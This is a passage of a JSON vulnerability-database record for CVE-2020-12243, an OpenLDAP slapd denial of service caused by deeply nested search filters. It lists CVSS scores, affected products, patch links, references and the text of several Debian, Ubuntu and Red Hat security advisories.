"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"_id": null,
"model": "openldap",
"scope": "eq",
"trust": 0.8,
"vendor": "openldap",
"version": "2.4.50"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:debian:debian_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:openldap:openldap",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159661"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "159552"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
}
],
"trust": 1.0
},
"cve": "CVE-2020-12243",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-12243",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-005084",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-164902",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2020-12243",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-005084",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-12243",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-005084",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2326",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-164902",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-12243",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"description": {
"_id": null,
"data": "In filter.c in slapd in OpenLDAP before 2.4.50, LDAP search filters with nested boolean expressions can result in denial of service (daemon crash). OpenLDAP Exists in a resource exhaustion vulnerability.Service operation interruption (DoS) It may be put into a state. The filter.c file of slapd in versions earlier than OpenLDAP 2.4.50 has a security vulnerability. \n\nFor the oldstable distribution (stretch), this problem has been fixed\nin version 2.4.44+dfsg-5+deb9u4. \n\nFor the stable distribution (buster), this problem has been fixed in\nversion 2.4.47+dfsg-3+deb10u2. \n\nWe recommend that you upgrade your openldap packages. \n\nFor the detailed security status of openldap please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl6ofsxfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Qx4Q//dOnPiP6bKHrFUFtyv59tV5Zpa1jJ6BmIr3/5ueODnBu8MHLJw8503zLJ\nI43LDTzvGkXrxy0Y28YC5Qpv1oHW3gvPzFsTrn2DObeUnHlKOOUsyzz3saHXyyzQ\nki+2UGsUXydSazDMeJzcoMfRdVpCtjc+GNTb/y7nxgwoKrz/WJplGstp2ibd8ftv\nJu4uT8VJZcC3IEGhkYXJ7TENlegOK2FCewYMZARrNT/tjIDyAqfKi2muCg7oadx/\n5WZGLW7Pdw25jFknVy/Y7fEyJDWQdPH7NchK5tZy6D1lWQh67GcvJFSo5HICwb+n\nFilP29mIBbS96JQq6u5jWWMpAD6RPCtIltak4QdYptjdrQnTDFy3RJSTdZeis8ty\nHKwYJgNzVG6SCy04t3D+zeMbgEZOvj6GWrURQUqZJQmc4V9l89E0/D7zV3AX9Q9v\n0hKEtpc//bZrS71QVqJvkWvrgfutB72Vnqfull+DBxvt33ma5W2il6kxGMwJK3S9\n0lk60dzEDCdYp8TE61y8N4z+2IB/Otg9Ni2I8pmaE5s1/ZUva+8GhSjbmGyIhbpk\np55kTiZUgpmu6EK2Kvjkh9rMlaa1IHXL8tdrbo8pRVtQHlA8/HUgoGiUHuX1h+Kw\nLZVjIV/L4qOFQ54uMbSscZgMEvhfW00fe3o2zI8WQZ9IPCQ3oRg=\n=K3JD\n-----END 
PGP SIGNATURE-----\n. =========================================================================\nUbuntu Security Notice USN-4352-2\nMay 06, 2020\n\nopenldap vulnerability\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n- Ubuntu 12.04 ESM\n\nSummary:\n\nOpenLDAP could be made to crash if it received specially crafted\nnetwork traffic. \n\nSoftware Description:\n- openldap: Lightweight Directory Access Protocol\n\nDetails:\n\nUSN-4352-1 fixed a vulnerability in OpenLDAP. This update provides\nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. \n\nOriginal advisory details:\n\n It was discovered that OpenLDAP incorrectly handled certain queries. A\n remote attacker could possibly use this issue to cause OpenLDAP to consume\n resources, resulting in a denial of service. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n slapd 2.4.31-1+nmu2ubuntu8.5+esm2\n\nUbuntu 12.04 ESM:\n slapd 2.4.28-1.1ubuntu4.10\n\nIn general, a standard system update will make all the necessary changes. 
\n\nBug Fix(es):\n\n* Gather image registry config (backport to 4.3) (BZ#1836815)\n\n* Builds fail after running postCommit script if OCP cluster is configured\nwith a container registry whitelist (BZ#1849176)\n\n* Login with OpenShift not working after cluster upgrade (BZ#1852429)\n\n* Limit the size of gathered federated metrics from alerts in Insights\nOperator (BZ#1874018)\n\n* [4.3] Storage operator stops reconciling when going Upgradeable=False on\nv1alpha1 CRDs (BZ#1879110)\n\n* [release 4.3] OpenShift APIs become unavailable for more than 15 minutes\nafter one of master nodes went down(OAuth) (BZ#1880293)\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.3.40-x86_64\n\nThe image digest is\nsha256:9ff90174a170379e90a9ead6e0d8cf6f439004191f80762764a5ca3dbaab01dc\n\n(For s390x architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.3.40-s390x\nThe image digest is\nsha256:605ddde0442e604cfe2d6bd1541ce48df5956fe626edf9cc95b1fca75d231b64\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.3.40-ppc64le\n\nThe image digest is\nsha256:d3c9e391c145338eae3feb7f6a4e487dadc8139a353117d642fe686d277bcccc\n\n3. Solution:\n\nFor OpenShift Container Platform 4.3 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.3/release_notes/ocp-4-3-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.3/updating/updating-cluster\n- -cli.html. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1836815 - Gather image registry config (backport to 4.3)\n1849176 - Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist\n1874018 - Limit the size of gathered federated metrics from alerts in Insights Operator\n1874399 - [DR] etcd-member-recover.sh fails to pull image with unauthorized\n1879110 - [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Red Hat Ansible Automation Platform Operator 1.2 security update\nAdvisory ID: RHSA-2021:1079-01\nProduct: Red Hat Ansible Automation Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1079\nIssue date: 2021-04-06\nKeywords: Security Update\nCVE Names: CVE-2017-12652 CVE-2018-20843 CVE-2019-5094\n CVE-2019-5188 CVE-2019-11719 CVE-2019-11727\n CVE-2019-11756 CVE-2019-12749 CVE-2019-14866\n CVE-2019-14973 CVE-2019-15903 CVE-2019-17006\n CVE-2019-17023 CVE-2019-17498 CVE-2019-17546\n CVE-2019-19956 CVE-2019-20388 CVE-2019-20907\n CVE-2020-1971 CVE-2020-5313 CVE-2020-6829\n CVE-2020-7595 CVE-2020-8177 CVE-2020-8625\n CVE-2020-12243 CVE-2020-12400 CVE-2020-12401\n CVE-2020-12402 CVE-2020-12403 CVE-2020-14422\n CVE-2020-15999 CVE-2021-3156 CVE-2021-3447\n CVE-2021-20178 CVE-2021-20180 CVE-2021-20191\n CVE-2021-20228\n====================================================================\n1. Summary:\n\nRed Hat Ansible Automation Platform Resource Operator 1.2 (technical\npreview) images that fix several security issues. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. 
A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat Ansible Automation Platform Resource Operator container images\nwith security fixes. \n\nAnsible Automation Platform manages Ansible Platform jobs and workflows\nthat can interface with any infrastructure on a Red Hat OpenShift Container\nPlatform cluster, or on a traditional infrastructure that is running\noff-cluster. \n\nSecurity fixes:\n\nCVE-2021-20191 ansible: multiple modules expose secured values\n[ansible_automation_platform-1.2] (BZ#1916813)\n\nCVE-2021-20178 ansible: user data leak in snmp_facts module\n[ansible_automation_platform-1.2] (BZ#1914774)\n\nCVE-2021-20180 ansible: ansible module: bitbucket_pipeline_variable exposes\nsecured values [ansible_automation_platform-1.2] (BZ#1915808)\n\nCVE-2021-20228 ansible: basic.py no_log with fallback option\n[ansible_automation_platform-1.2] (BZ#1925002)\n\nCVE-2021-3447 ansible: multiple modules expose secured values\n[ansible_automation_platform-1.2] (BZ#1939349)\n\nFor more details about the security issue, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module\n1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values\n1916813 - CVE-2021-20191 ansible: multiple modules expose secured values\n1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option\n1939349 - CVE-2021-3447 ansible: multiple modules expose secured values\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-12652\nhttps://access.redhat.com/security/cve/CVE-2018-20843\nhttps://access.redhat.com/security/cve/CVE-2019-5094\nhttps://access.redhat.com/security/cve/CVE-2019-5188\nhttps://access.redhat.com/security/cve/CVE-2019-11719\nhttps://access.redhat.com/security/cve/CVE-2019-11727\nhttps://access.redhat.com/security/cve/CVE-2019-11756\nhttps://access.redhat.com/security/cve/CVE-2019-12749\nhttps://access.redhat.com/security/cve/CVE-2019-14866\nhttps://access.redhat.com/security/cve/CVE-2019-14973\nhttps://access.redhat.com/security/cve/CVE-2019-15903\nhttps://access.redhat.com/security/cve/CVE-2019-17006\nhttps://access.redhat.com/security/cve/CVE-2019-17023\nhttps://access.redhat.com/security/cve/CVE-2019-17498\nhttps://access.redhat.com/security/cve/CVE-2019-17546\nhttps://access.redhat.com/security/cve/CVE-2019-19956\nhttps://access.redhat.com/security/cve/CVE-2019-20388\nhttps://access.redhat.com/security/cve/CVE-2019-20907\nhttps://access.redhat.com/security/cve/CVE-2020-1971\nhttps://access.redhat.com/security/cve/CVE-2020-5313\nhttps://access.redhat.com/security/cve/CVE-2020-6829\nhttps://access.redhat.com/security/cve/CVE-2020-7595\nhttps://access.redhat.com/security/cve/CVE-2020-8177\nhttps://access.redhat.com/security/cve/CVE-2020-8625\nhttps://access.redhat.com/security/cve/CVE-2020-12243\nhttps://access.redhat.com/security/cve/CVE-2020-12400\nhttps://access.redhat.com/security/cve/CVE-2020-12401\nhttps://access.redhat.com/security/cve/CVE-2020-12402\nhttps://access.redh
at.com/security/cve/CVE-2020-12403\nhttps://access.redhat.com/security/cve/CVE-2020-14422\nhttps://access.redhat.com/security/cve/CVE-2020-15999\nhttps://access.redhat.com/security/cve/CVE-2021-3156\nhttps://access.redhat.com/security/cve/CVE-2021-3447\nhttps://access.redhat.com/security/cve/CVE-2021-20178\nhttps://access.redhat.com/security/cve/CVE-2021-20180\nhttps://access.redhat.com/security/cve/CVE-2021-20191\nhttps://access.redhat.com/security/cve/CVE-2021-20228\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/security/cve/CVE-2021-20191\nhttps://access.redhat.com/security/cve/CVE-2021-20178\nhttps://access.redhat.com/security/cve/CVE-2021-20180\nhttps://access.redhat.com/security/cve/CVE-2021-20228\nhttps://access.redhat.com/security/cve/CVE-2021-3447\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYHBeatzjgjWX9erEAQhLuw//QLV4QWc4E9o8cG3IJr3xIt6b/OHs6b9s\nhp04e5kT7IWFpmR3VXK+BEK2dd+NiGdvXPOpwe4BaOUWEDmq+dx4Vac5Z0GcZJUK\nAJz8dXFPYBgIafuIkWyY9UIvSO/VsQ2Dr4+KUnB1obALAz3ndSoQJFS1hysFBXHS\n+MulKiYVwFw7UbfvGuFLjmLrNTAflVa9MHmdh3P53bU+U2mCgzuHTFIpodkZhuIt\naIR0H/dgHXXG8co20Zb5Nciqr0CxqejQ+xz84Yu0I+y1LWdBAhi34c3zJY4rlEQS\n6/nfcsSPEadNCTXQu/TX6yvo6sE8A7/xGh1PDf0PLVv+Xh7TE53MtmTnYcl8uiRO\n9m3CfJ7PLO2hpl6QuJzuUe7nXx65/qIoKQjZfNpZVXj/LQtL1F4RE7szmswIGNZL\nIG51pYEUE98aR3gIlLpoMjW4vtC+rdcwSBaLW5gH1Q5hNRlTLmFBTKmYNkCpd4Ho\nNP3AKEwx9R8ZdGYcCuZwYPvSQSqX+B9qURw5G4E/vbso8Vh9RYQ3kusnf93Q/1LG\nImHCbsVWJDMMt/NRj5OvqgZc18ROqHhSpuJ+A44VCI+UihkZb2ai4DjGef0WHZhq\nXTMyLECTJIwM4aY+BC1ohYm0Whvs/w/hd03tGFBJhlIoBYakY6o8lRD7hCc8E/YI\ndEQ0aSabgEY=D/Lt\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 
Description:\n\n* Updated python-psutil version to 5.6.6 inside ansible-runner container\n(CVE-2019-18874)\n\n3. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1772014 - CVE-2019-18874 python-psutil: double free because of refcount mishandling\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12243"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "PACKETSTORM",
"id": "168811"
},
{
"db": "PACKETSTORM",
"id": "157602"
},
{
"db": "PACKETSTORM",
"id": "159661"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "157601"
},
{
"db": "PACKETSTORM",
"id": "159552"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-12243",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "157602",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159553",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162142",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "161727",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "159347",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "161916",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162130",
"trust": 0.7
},
{
"db": "ICS CERT",
"id": "ICSA-22-116-01",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.1207",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1637",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2604",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0845",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1742.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3631",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1742",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1458",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0986",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3535",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1193",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1569",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1613",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "159552",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "157601",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2020-27485",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-164902",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-12243",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168811",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159661",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "PACKETSTORM",
"id": "168811"
},
{
"db": "PACKETSTORM",
"id": "157602"
},
{
"db": "PACKETSTORM",
"id": "159661"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "157601"
},
{
"db": "PACKETSTORM",
"id": "159552"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"id": "VAR-202004-0530",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
}
],
"trust": 0.725
},
"last_update_date": "2026-04-10T22:49:42.856000Z",
"patch": {
"_id": null,
"data": [
{
"title": "[SECURITY] [DLA 2199-1] openldap security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00001.html"
},
{
"title": "DSA-4666",
"trust": 0.8,
"url": "https://www.debian.org/security/2020/dsa-4666"
},
{
"title": "Issue#9248",
"trust": 0.8,
"url": "https://git.openldap.org/openldap/openldap/-/blob/OPENLDAP_REL_ENG_2_4/CHANGES"
},
{
"title": "ITS#9202 limit depth of nested filters",
"trust": 0.8,
"url": "https://git.openldap.org/openldap/openldap/-/commit/98464c11df8247d6a11b52e294ba5dd4f0380440"
},
{
"title": "Issue 9202",
"trust": 0.8,
"url": "https://bugs.openldap.org/show_bug.cgi?id=9202"
},
{
"title": "OpenLDAP Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=118093"
},
{
"title": "Red Hat: Moderate: openldap security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204041 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: openldap vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4352-1"
},
{
"title": "Ubuntu Security Notice: openldap vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4352-2"
},
{
"title": "Debian Security Advisories: DSA-4666-1 openldap -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=fb4df889a45e12b120ab07487d89cbed"
},
{
"title": "Amazon Linux 2: ALAS2-2020-1539",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2020-1539"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7 runner release (CVE-2019-18874)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204254 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.6 runner release (CVE-2019-18874)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204255 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities affect IBM Cloud Object Storage Systems (July 2020v1)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4ca8040b949152189bea3a3126afcd39"
},
{
"title": "Red Hat: Low: OpenShift Container Platform 4.3.40 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204264 - Security Advisory"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-674",
"trust": 1.1
},
{
"problemtype": "CWE-400",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12243"
},
{
"trust": 1.9,
"url": "https://usn.ubuntu.com/4352-1/"
},
{
"trust": 1.8,
"url": "https://git.openldap.org/openldap/openldap/-/blob/openldap_rel_eng_2_4/changes"
},
{
"trust": 1.8,
"url": "https://git.openldap.org/openldap/openldap/-/commit/98464c11df8247d6a11b52e294ba5dd4f0380440"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200511-0003/"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht211289"
},
{
"trust": 1.8,
"url": "https://www.debian.org/security/2020/dsa-4666"
},
{
"trust": 1.8,
"url": "https://bugs.openldap.org/show_bug.cgi?id=9202"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00001.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00016.html"
},
{
"trust": 1.8,
"url": "https://usn.ubuntu.com/4352-2/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12243"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1742.2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3535/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1458/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1569/"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-116-01"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159553/red-hat-security-advisory-2020-4255-01.html"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht211289"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0986"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/openldap-denial-of-service-via-search-filters-32124"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1207"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0845"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2604"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159347/red-hat-security-advisory-2020-4041-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161727/red-hat-security-advisory-2021-0778-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157602/ubuntu-security-notice-usn-4352-2.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1637/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161916/red-hat-security-advisory-2021-0949-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162142/red-hat-security-advisory-2021-1079-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1613/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1193"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3631/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1742/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162130/red-hat-security-advisory-2021-1129-01.html"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17006"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-12749"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.4,
